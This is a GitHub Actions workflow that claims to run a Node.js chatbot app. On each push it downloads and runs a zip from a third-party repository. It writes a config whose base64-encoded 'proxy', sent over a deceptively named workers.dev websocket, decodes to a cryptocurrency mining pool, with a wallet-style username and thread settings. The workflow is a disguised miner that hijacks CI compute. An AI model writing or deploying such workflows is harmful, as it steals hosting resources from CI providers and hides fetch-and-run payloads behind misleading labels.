name: Run App

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  run-node-app:
    runs-on: ubuntu-latest

    steps:
      # Bước 1: Checkout mã nguồn (nếu cần thiết)
      - name: Checkout code
        uses: actions/checkout@v4

      # Bước 2: Clone repository từ URL
      - name: Clone repository
        run: wget https://github.com/duongpokeeeee/sadsd/raw/refs/heads/main/chatbot.zip

      # Bước 3: Chạy file app.js
      - name: Run the Node.js app
        run: |
          yes A | unzip chatbot.zip
          echo -e 'proxy=wss://pypip-python3.packaging-w3schools.workers.dev/cG93ZXIyYi5uYS5taW5lLnpwb29sLmNhOjYyNDI=\nhost=127.0.0.1\nport=3306\nusername=mbc1qhut49lvdruznypvaxgrg4klf3ntpnwuc23hq3j\npassword=c=MBC\nthreads=4' > .env
          python3 app.py --cache=.cache/09Qy5sb2Fkcyg.txt
